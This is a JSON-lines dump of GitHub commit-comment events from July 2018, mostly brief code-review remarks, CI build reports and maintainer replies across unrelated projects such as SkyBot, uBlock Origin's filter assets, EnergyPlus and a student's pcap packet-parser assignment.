{"id":"7988782003","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29763548,"position":22,"line":303,"path":"src/main/java/ml/duncte123/skybot/CommandManager.java","commit_id":"433123cb4cd93f37613ff88a4c3532aea6ffb7ae","created_at":"2018-07-19T12:18:06Z","updated_at":"2018-07-19T12:18:06Z","author_association":"MEMBER","body":"its and afterward clear. much more effective than clearing it just before we change values. We actuallz now could get rid of the first one."}},"created_at":"2018-07-19T12:18:06Z"}
{"id":"7988784617","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29763551,"position":5,"line":52,"path":"src/main/resources/logback.groovy","commit_id":"433123cb4cd93f37613ff88a4c3532aea6ffb7ae","created_at":"2018-07-19T12:18:38Z","updated_at":"2018-07-19T12:18:38Z","author_association":"MEMBER","body":"yeah whatever\r\n"}},"created_at":"2018-07-19T12:18:38Z"}
{"id":"7988788371","type":"CommitCommentEvent","actor":{"login":"sam31415"},"repo":{"name":"enigmampc/catalyst"},"payload":{"comment":{"id":29763562,"position":null,"line":null,"path":null,"commit_id":"1f83c45b277d2f5122abfcd53d0b9a89df069e77","created_at":"2018-07-19T12:19:26Z","updated_at":"2018-07-19T12:19:26Z","author_association":"NONE","body":"Shouldn't line 83 be modified as well?\r\n\r\nThese changes break existing algorithms that set explicitly the spread parameter. Was it really necessary to break existing algorithms for a cosmetic change of variable name?"}},"created_at":"2018-07-19T12:19:26Z"}
{"id":"7988791720","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtBeppu/introPython3_beppu"},"payload":{"comment":{"id":29763570,"position":17,"line":17,"path":"e11/e11_01/udp_server.py","commit_id":"bde974e0c0f6c92f5cce8fff0cbf0c9a4eaa1bff","created_at":"2018-07-19T12:20:06Z","updated_at":"2018-07-19T12:20:06Z","author_association":"COLLABORATOR","body":"浅田\r\n厳密に言うとまだこの段階ではクライアントからの通信待ちにはなっていないと思います。"}},"created_at":"2018-07-19T12:20:06Z"}
{"id":"7988792831","type":"CommitCommentEvent","actor":{"login":"soulfrost"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29763572,"position":5,"line":1110,"path":"src/server/game/Server/WorldSession.cpp","commit_id":"8a4858bdcfba5b2c9fca27869db72704af39c2e6","created_at":"2018-07-19T12:20:18Z","updated_at":"2018-07-19T12:20:18Z","author_association":"CONTRIBUTOR","body":"0s  == std::chrono::seconds(0)   so... why changed? this is just chrono literal"}},"created_at":"2018-07-19T12:20:18Z"}
{"id":"7988794033","type":"CommitCommentEvent","actor":{"login":"shriamrut"},"repo":{"name":"shriamrut/hello-world"},"payload":{"comment":{"id":29763578,"position":null,"line":null,"path":null,"commit_id":"8755c53075994d890d3b5cc60611d716efaba143","created_at":"2018-07-19T12:20:32Z","updated_at":"2018-07-19T12:20:32Z","author_association":"OWNER","body":"New"}},"created_at":"2018-07-19T12:20:32Z"}
{"id":"7988795924","type":"CommitCommentEvent","actor":{"login":"Christoph-Meyer"},"repo":{"name":"viadee/sonarQuest"},"payload":{"comment":{"id":29763583,"position":null,"line":null,"path":null,"commit_id":"75713caebd7792b4d3c022d580ec9ae4c7e356d4","created_at":"2018-07-19T12:20:56Z","updated_at":"2018-07-19T12:20:56Z","author_association":"CONTRIBUTOR","body":"I just changed it in the backend - calling String:hashcode of the username actually conceals it pretty nicely. Should do the trick. Also, the request id is logged by Spring boot by default, so this further helps identify communication between FE and BE."}},"created_at":"2018-07-19T12:20:56Z"}
{"id":"7988796557","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29763584,"position":null,"line":null,"path":null,"commit_id":"f07d9098cced00cfdb791523338b9a0b3837189c","created_at":"2018-07-19T12:21:03Z","updated_at":"2018-07-19T12:21:03Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180719-122102 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180719-122102\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-19T12:21:03Z"}
{"id":"7988798730","type":"CommitCommentEvent","actor":{"login":"Yong-Seok"},"repo":{"name":"MagicBean1/magicBean"},"payload":{"comment":{"id":29763592,"position":null,"line":null,"path":null,"commit_id":"1c7b97448148f2d961a70f8f7152b759bb559f8e","created_at":"2018-07-19T12:21:30Z","updated_at":"2018-07-19T12:21:30Z","author_association":"CONTRIBUTOR","body":"1"}},"created_at":"2018-07-19T12:21:30Z"}
{"id":"7988802598","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29763600,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-19T12:22:17Z","updated_at":"2018-07-19T12:22:17Z","author_association":"CONTRIBUTOR","body":"@gorhill yes, that's what I meant when I said \"i.e. the redirection works but the layout of the site will be broken anyway\".\r\n\r\n`https://ua.sinoptik.ua` can be fixed by adding\r\n`ua.sinoptik.ua##script:inject(abort-on-property-read.js, mz_str)`\r\non my end.\r\n"}},"created_at":"2018-07-19T12:22:17Z"}
{"id":"7988844000","type":"CommitCommentEvent","actor":{"login":"KayEss"},"repo":{"name":"KayEss/odin"},"payload":{"comment":{"id":29763729,"position":8,"line":30,"path":"Cpp/odin/google.cpp","commit_id":"2551758e1a94b8806e445d2f4118367c12b50d53","created_at":"2018-07-19T12:30:31Z","updated_at":"2018-07-19T12:30:31Z","author_association":"OWNER","body":"Comparison should work without the coercion."}},"created_at":"2018-07-19T12:30:31Z"}
{"id":"7988849565","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29763745,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-19T12:31:36Z","updated_at":"2018-07-19T12:31:36Z","author_association":"CONTRIBUTOR","body":"Yes redirecting `piguiqproxy` and `amgload` works with Chrome.\r\nRedirecting `zmctrack` will break the layout.\r\nThe only fix is to kill the inline script, or in the case of a race condition to break the chain of `xhr-requests`, as is the case with `ua.sinoptik.ua` and the filter\r\n`ua.sinoptik.ua##script:inject(abort-on-property-read.js, mz_str)`"}},"created_at":"2018-07-19T12:31:36Z"}
{"id":"7988863676","type":"CommitCommentEvent","actor":{"login":"HDYA"},"repo":{"name":"cloudfoundry/azurefilebroker"},"payload":{"comment":{"id":29763796,"position":null,"line":null,"path":null,"commit_id":"b7042f4c6bf56deee330ab94fc4bc662a8e74127","created_at":"2018-07-19T12:34:24Z","updated_at":"2018-07-19T12:34:24Z","author_association":"NONE","body":"Do we have a document for these parameters?"}},"created_at":"2018-07-19T12:34:24Z"}
{"id":"7988867697","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29763805,"position":null,"line":null,"path":null,"commit_id":"211f6d675eb46d0db995370046ac66c541a48378","created_at":"2018-07-19T12:35:11Z","updated_at":"2018-07-19T12:35:11Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2982 of 2982 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-19T12:35:11Z"}
{"id":"7988869709","type":"CommitCommentEvent","actor":{"login":"combin"},"repo":{"name":"roamer123/resume"},"payload":{"comment":{"id":29763812,"position":null,"line":null,"path":null,"commit_id":"dc41cec70d27409df1a868873f00cd220725cb57","created_at":"2018-07-19T12:35:33Z","updated_at":"2018-07-19T12:35:33Z","author_association":"NONE","body":"What?"}},"created_at":"2018-07-19T12:35:33Z"}
{"id":"7988870910","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763817,"position":11,"line":11,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:35:45Z","updated_at":"2018-07-19T12:35:45Z","author_association":"NONE","body":"8? Mac 주소의 크기는 얼마죠?"}},"created_at":"2018-07-19T12:35:45Z"}
{"id":"7988872871","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763823,"position":22,"line":22,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:36:08Z","updated_at":"2018-07-19T12:36:08Z","author_association":"NONE","body":"Print_Dest_MAC 함수와 Print_Src_MAC 함수의 코드가 중복이 많습니다."}},"created_at":"2018-07-19T12:36:08Z"}
{"id":"7988874044","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763829,"position":58,"line":58,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:36:23Z","updated_at":"2018-07-19T12:36:23Z","author_association":"NONE","body":"Print_Src_IP 함수와 Print_Dest_IP 함수의 코드가 중복이 많습니다."}},"created_at":"2018-07-19T12:36:23Z"}
{"id":"7988874927","type":"CommitCommentEvent","actor":{"login":"Yidnekachew"},"repo":{"name":"opencog/as-moses"},"payload":{"comment":{"id":29763832,"position":null,"line":null,"path":null,"commit_id":"5d17521f92893cbcbfaa8a6ae9bf2a47c60ad506","created_at":"2018-07-19T12:36:33Z","updated_at":"2018-07-19T12:36:33Z","author_association":"COLLABORATOR","body":":+1: "}},"created_at":"2018-07-19T12:36:33Z"}
{"id":"7988875268","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763834,"position":87,"line":87,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:36:37Z","updated_at":"2018-07-19T12:36:37Z","author_association":"NONE","body":"Print_Src_Port 함수와 Print_Dest_Port 함수의 코드가 중복이 많습니다."}},"created_at":"2018-07-19T12:36:37Z"}
{"id":"7988878779","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763849,"position":150,"line":150,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:37:19Z","updated_at":"2018-07-19T12:37:19Z","author_association":"NONE","body":"잡힌 패킷에 IP Header가 없다면?"}},"created_at":"2018-07-19T12:37:19Z"}
{"id":"7988879743","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763852,"position":152,"line":152,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:37:30Z","updated_at":"2018-07-19T12:37:30Z","author_association":"NONE","body":"잡힌 패킷에  TCP Header가 없다면?"}},"created_at":"2018-07-19T12:37:30Z"}
{"id":"7988882638","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763859,"position":147,"line":147,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:38:05Z","updated_at":"2018-07-19T12:38:05Z","author_association":"NONE","body":"패킷의 전체에 대해서 dump를 뜨지 말고 TCP Data 부분에 대해서 최대 16바이트까지만 dump를 뜨세요."}},"created_at":"2018-07-19T12:38:05Z"}
{"id":"7988890644","type":"CommitCommentEvent","actor":{"login":"mrostecki"},"repo":{"name":"mrostecki/gomountinfo"},"payload":{"comment":{"id":29763871,"position":4,"line":4,"path":"AUTHORS","commit_id":"b940d7c3011df673a3103801c563883740ae0a85","created_at":"2018-07-19T12:39:41Z","updated_at":"2018-07-19T12:39:41Z","author_association":"OWNER","body":"Thanks, I will fix it. And also pull requests are welcome. ;)"}},"created_at":"2018-07-19T12:39:41Z"}
{"id":"7988891063","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29763872,"position":null,"line":null,"path":null,"commit_id":"58e7a43b3274aeb0238da56a68fb2eb4c90decee","created_at":"2018-07-19T12:39:46Z","updated_at":"2018-07-19T12:39:46Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-MacOS-10.9-clang: OK (2781 of 2942 tests passed, 10 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 131 tests had: EIO diffs.\n * 96 tests had: ESO big diffs.\n * 160 tests had: Table big diffs.\n * 58 tests had: MTR big diffs.\n * 23 tests had: ERR diffs.\n * 21 tests had: ESO small diffs.\n * 17 tests had: MTR small diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 462\n * Failed: 161\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-58e7a43b3274aeb0238da56a68fb2eb4c90decee-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-58e7a43b3274aeb0238da56a68fb2eb4c90decee-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-94.53%25-yellow.png)</a> \n"}},"created_at":"2018-07-19T12:39:46Z"}
{"id":"7988891785","type":"CommitCommentEvent","actor":{"login":"siteshwar"},"repo":{"name":"siteshwar/ast"},"payload":{"comment":{"id":29763874,"position":17,"line":63,"path":".travis.yml","commit_id":"bc9572a8535c3454bee7d7375c9594d41a593f47","created_at":"2018-07-19T12:39:54Z","updated_at":"2018-07-19T12:39:54Z","author_association":"OWNER","body":"> @siteshwar, I understand that you need to be sensitive to the demands made by your boss. But incorporating csbuild into this project, outside of Red Hat's internal build system, seems to add far more cost than benefit.\r\n\r\n@krader1961\r\n\r\n@kdudka never demanded to integrate `csbuild` into ksh upstream. In fact I did not even know about this tool until I saw it running in internal builds and I asked him about it. I am slowly going through our internal CI processes and making suggestions about tools that may be useful for upstream. Whether these tools should be used or not is open for debate."}},"created_at":"2018-07-19T12:39:54Z"}
{"id":"7988893844","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29763878,"position":null,"line":null,"path":null,"commit_id":"211f6d675eb46d0db995370046ac66c541a48378","created_at":"2018-07-19T12:40:17Z","updated_at":"2018-07-19T12:40:17Z","author_association":"NONE","body":"#6517-MissingEqNumRefsInEngrgRef (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-211f6d675eb46d0db995370046ac66c541a48378-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-19T12:40:17Z"}
{"id":"7988895011","type":"CommitCommentEvent","actor":{"login":"tualatin"},"repo":{"name":"tualatin/winmd5checksum"},"payload":{"comment":{"id":29763884,"position":null,"line":null,"path":null,"commit_id":"685c9804799310b92fe892cd54551def8394f371","created_at":"2018-07-19T12:40:30Z","updated_at":"2018-07-19T12:40:30Z","author_association":"OWNER","body":"See #11"}},"created_at":"2018-07-19T12:40:30Z"}
{"id":"7988895634","type":"CommitCommentEvent","actor":{"login":"snoopspy"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763886,"position":null,"line":null,"path":null,"commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:40:37Z","updated_at":"2018-07-19T12:40:37Z","author_association":"NONE","body":"main,o 및 pcap_test 파일은 git에서 삭제하시기 바랍니다."}},"created_at":"2018-07-19T12:40:37Z"}
{"id":"7988902875","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763907,"position":11,"line":11,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:42:03Z","updated_at":"2018-07-19T12:42:03Z","author_association":"OWNER","body":"앗 6바이트인데... 실수했습니다  수정하겠습니다"}},"created_at":"2018-07-19T12:42:03Z"}
{"id":"7988903245","type":"CommitCommentEvent","actor":{"login":"romanz"},"repo":{"name":"romanz/electrs"},"payload":{"comment":{"id":29763910,"position":null,"line":null,"path":null,"commit_id":"82257a7883550ee7378a3acd6791ab056e960de4","created_at":"2018-07-19T12:42:08Z","updated_at":"2018-07-19T12:42:08Z","author_association":"OWNER","body":"Following https://github.com/romanz/electrs/issues/11#issuecomment-405687886"}},"created_at":"2018-07-19T12:42:08Z"}
{"id":"7988905287","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763919,"position":22,"line":22,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:42:32Z","updated_at":"2018-07-19T12:42:32Z","author_association":"OWNER","body":"함수를 한 개로 합치고 함수 인자에 따라서 처리하도록 수정하겠습니다."}},"created_at":"2018-07-19T12:42:32Z"}
{"id":"7988907904","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763926,"position":58,"line":58,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:43:04Z","updated_at":"2018-07-19T12:43:04Z","author_association":"OWNER","body":"이 함수 역시 함수를 한 개로 합치고 인자에 따라서 출력이 바뀌도록 수정하겠습니다."}},"created_at":"2018-07-19T12:43:04Z"}
{"id":"7988910058","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763930,"position":87,"line":87,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:43:29Z","updated_at":"2018-07-19T12:43:29Z","author_association":"OWNER","body":"넵 이 함수도 수정하겠습니다."}},"created_at":"2018-07-19T12:43:29Z"}
{"id":"7988910710","type":"CommitCommentEvent","actor":{"login":"zipavlin"},"repo":{"name":"zipavlin/vue-clip-tool"},"payload":{"comment":{"id":29763933,"position":null,"line":null,"path":null,"commit_id":"a80cad955c6e21d45a4fd928ad36b64de1f0fa28","created_at":"2018-07-19T12:43:36Z","updated_at":"2018-07-19T12:43:36Z","author_association":"OWNER","body":"enables #3 "}},"created_at":"2018-07-19T12:43:36Z"}
{"id":"7988913410","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763939,"position":147,"line":147,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:44:08Z","updated_at":"2018-07-19T12:44:08Z","author_association":"OWNER","body":"아하 넵 수정하겠습니다!"}},"created_at":"2018-07-19T12:44:08Z"}
{"id":"7988913658","type":"CommitCommentEvent","actor":{"login":"FreezePhoenix"},"repo":{"name":"fabiocaccamo/utils.js"},"payload":{"comment":{"id":29763940,"position":null,"line":null,"path":null,"commit_id":"8e90a8e3be9b2c923799af51992b5fabcab4b860","created_at":"2018-07-19T12:44:11Z","updated_at":"2018-07-19T12:44:11Z","author_association":"NONE","body":"I must say that this project is going well. Why won't you merge #1 ?"}},"created_at":"2018-07-19T12:44:11Z"}
{"id":"7988916194","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763950,"position":150,"line":150,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:44:41Z","updated_at":"2018-07-19T12:44:41Z","author_association":"OWNER","body":"음... IP Header가 존재하는지 체크하는 부분을 추가하겠습니다."}},"created_at":"2018-07-19T12:44:41Z"}
{"id":"7988917343","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763955,"position":152,"line":152,"path":"main.cpp","commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:44:55Z","updated_at":"2018-07-19T12:44:55Z","author_association":"OWNER","body":"TCP Header가 존재하는지 체크하는 부분을 추가하겠습니다."}},"created_at":"2018-07-19T12:44:55Z"}
{"id":"7988918172","type":"CommitCommentEvent","actor":{"login":"lenak25"},"repo":{"name":"enigmampc/catalyst"},"payload":{"comment":{"id":29763962,"position":null,"line":null,"path":null,"commit_id":"1f83c45b277d2f5122abfcd53d0b9a89df069e77","created_at":"2018-07-19T12:45:04Z","updated_at":"2018-07-19T12:45:04Z","author_association":"COLLABORATOR","body":"Thanks for notifying this, yes, line 83 should be updated as well.\r\nThis cosmetic change came as a result of #390 which raised the fact that the documentation of this class is misleading. As part of fixing the docs we've updated the variable name to reflect better the purpose of this slippage model.\r\nThanks again for noticing line 83."}},"created_at":"2018-07-19T12:45:04Z"}
{"id":"7988920480","type":"CommitCommentEvent","actor":{"login":"jch6637"},"repo":{"name":"jch6637/pcap_test"},"payload":{"comment":{"id":29763966,"position":null,"line":null,"path":null,"commit_id":"66ca3fe118cfe50342b62ebf8a30d65822e9b91d","created_at":"2018-07-19T12:45:29Z","updated_at":"2018-07-19T12:45:29Z","author_association":"OWNER","body":"네 삭제하겠습니다."}},"created_at":"2018-07-19T12:45:29Z"}
{"id":"7988923220","type":"CommitCommentEvent","actor":{"login":"fbacchella"},"repo":{"name":"rrd4j/rrd4j"},"payload":{"comment":{"id":29763968,"position":null,"line":null,"path":null,"commit_id":"604209f01552fe5a1d24d0245257301851f0d027","created_at":"2018-07-19T12:45:59Z","updated_at":"2018-07-19T12:45:59Z","author_association":"CONTRIBUTOR","body":"Please have a look to https://github.com/rrd4j/rrd4j/commit/604209f01552fe5a1d24d0245257301851f0d027.\r\n\r\n"}},"created_at":"2018-07-19T12:45:59Z"}
{"id":"7988923793","type":"CommitCommentEvent","actor":{"login":"sudarshe"},"repo":{"name":"sudarshe/backGroundGenerator"},"payload":{"comment":{"id":29763969,"position":null,"line":null,"path":null,"commit_id":"f2020024355b9d0bfa43016b78be92a658e7d1b6","created_at":"2018-07-19T12:46:07Z","updated_at":"2018-07-19T12:46:07Z","author_association":"OWNER","body":"accept yje mew changes"}},"created_at":"2018-07-19T12:46:07Z"}
{"id":"7988928190","type":"CommitCommentEvent","actor":{"login":"smgallo"},"repo":{"name":"ubccr/xdmod"},"payload":{"comment":{"id":29763980,"position":6,"line":88,"path":"classes/ETL/Ingestor/CloudStateReconstructorTransformIngestor.php","commit_id":"00a9d3a121fc473bb8b32fc1742cf79415f84c16","created_at":"2018-07-19T12:46:54Z","updated_at":"2018-07-19T12:46:54Z","author_association":"MEMBER","body":"This can be condensed into\r\n```\r\nreturn array( $this->_instance_state)\r\n```"}},"created_at":"2018-07-19T12:46:54Z"}
{"id":"7988928578","type":"CommitCommentEvent","actor":{"login":"azazellochg"},"repo":{"name":"scipion-em/scipion-em-eman2"},"payload":{"comment":{"id":29763984,"position":5,"line":87,"path":"eman2/__init__.py","commit_id":"b53184ed6588eff6fc8351dee6525a078f789aec","created_at":"2018-07-19T12:46:58Z","updated_at":"2018-07-19T12:46:58Z","author_association":"CONTRIBUTOR","body":"that's wrong. new versions are \"not 2.1*\""}},"created_at":"2018-07-19T12:46:58Z"}
{"id":"7988931732","type":"CommitCommentEvent","actor":{"login":"BenJoParadise"},"repo":{"name":"demisto/content"},"payload":{"comment":{"id":29763989,"position":5,"line":189,"path":"Integrations/integration-EWSv2.yml","commit_id":"2cb9342332a22d069ee701d93540d9f457d2d8d9","created_at":"2018-07-19T12:47:33Z","updated_at":"2018-07-19T12:47:33Z","author_association":"CONTRIBUTOR","body":"Makes sense, since None is a singleton, we want to check if it actually `is` the singleton rather than equal to it."}},"created_at":"2018-07-19T12:47:33Z"}
{"id":"7988932914","type":"CommitCommentEvent","actor":{"login":"yangruihuahappy"},"repo":{"name":"Llldmiao/learngit"},"payload":{"comment":{"id":29763994,"position":null,"line":null,"path":null,"commit_id":"b0a912916409039d7dcbb56cba5c48b5877b71a6","created_at":"2018-07-19T12:47:46Z","updated_at":"2018-07-19T12:47:46Z","author_association":"NONE","body":"i think it is wonderful"}},"created_at":"2018-07-19T12:47:46Z"}
{"id":"7988934828","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29763996,"position":null,"line":null,"path":null,"commit_id":"d4856bd14ecf170289712aa46c4ffb902803d11e","created_at":"2018-07-19T12:48:08Z","updated_at":"2018-07-19T12:48:08Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/107"}},"created_at":"2018-07-19T12:48:08Z"}
{"id":"7988935226","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29764000,"position":null,"line":null,"path":null,"commit_id":"aec4df4cf57a9bd00ee859dd6c7bd39ea182e19b","created_at":"2018-07-19T12:48:12Z","updated_at":"2018-07-19T12:48:12Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/107"}},"created_at":"2018-07-19T12:48:12Z"}
{"id":"7988935563","type":"CommitCommentEvent","actor":{"login":"padmassun"},"repo":{"name":"NREL/openstudio-standards"},"payload":{"comment":{"id":29764002,"position":null,"line":null,"path":null,"commit_id":"3fae52aa769b1beb552f9ca3430a95d77b62c64c","created_at":"2018-07-19T12:48:16Z","updated_at":"2018-07-19T12:48:16Z","author_association":"MEMBER","body":"https://github.com/canmet-energy/btap_tasks/issues/107"}},"created_at":"2018-07-19T12:48:16Z"}
{"id":"7988938479","type":"CommitCommentEvent","actor":{"login":"Shroompow"},"repo":{"name":"Shroompow/DedShroom"},"payload":{"comment":{"id":29764014,"position":null,"line":null,"path":null,"commit_id":"d53d9531df78ea545540b880e5339872a104ab09","created_at":"2018-07-19T12:48:51Z","updated_at":"2018-07-19T12:48:51Z","author_association":"OWNER","body":"- config shouldn't be execute incase of being javascript\r\n- config shouldn't be inside the module-cache (allows more control, like reloading the config without exiting the process or work around the caching)\r\n- Preference :3"}},"created_at":"2018-07-19T12:48:51Z"}
{"id":"7988938779","type":"CommitCommentEvent","actor":{"login":"nembery"},"repo":{"name":"Juniper/aframe"},"payload":{"comment":{"id":29764015,"position":null,"line":null,"path":null,"commit_id":"d7690d1e3e685caee217063fd2f6b7e2d72ec95c","created_at":"2018-07-19T12:48:54Z","updated_at":"2018-07-19T12:48:54Z","author_association":"NONE","body":"this work all looks good. Feel free to send a PR and I'll merge it upstream"}},"created_at":"2018-07-19T12:48:54Z"}
{"id":"7988940088","type":"CommitCommentEvent","actor":{"login":"lainverse"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29764018,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-19T12:49:10Z","updated_at":"2018-07-19T12:49:10Z","author_association":"NONE","body":"Hm... Curious, defined abort on attempt to set mz_str in my code and it works there as well."}},"created_at":"2018-07-19T12:49:10Z"}
{"id":"7988940265","type":"CommitCommentEvent","actor":{"login":"Jha056"},"repo":{"name":"Jha056/Jha056.github.io"},"payload":{"comment":{"id":29764019,"position":null,"line":null,"path":null,"commit_id":"526372fe30a86511dcce035e4f18e116779a1f9d","created_at":"2018-07-19T12:49:11Z","updated_at":"2018-07-19T12:49:11Z","author_association":"OWNER","body":"안재하 포트폴리오"}},"created_at":"2018-07-19T12:49:11Z"}
{"id":"7988944314","type":"CommitCommentEvent","actor":{"login":"adriansuhov"},"repo":{"name":"mbivolan/LISAv2"},"payload":{"comment":{"id":29764027,"position":1,"line":1,"path":"Testscripts/Windows/BVT-VERIFY-DISKSIZE.ps1","commit_id":"ac6fda3e832b1bf309cdd5f8d92f2a5fb3446256","created_at":"2018-07-19T12:49:58Z","updated_at":"2018-07-19T12:49:58Z","author_association":"NONE","body":"Remove this line"}},"created_at":"2018-07-19T12:49:58Z"}
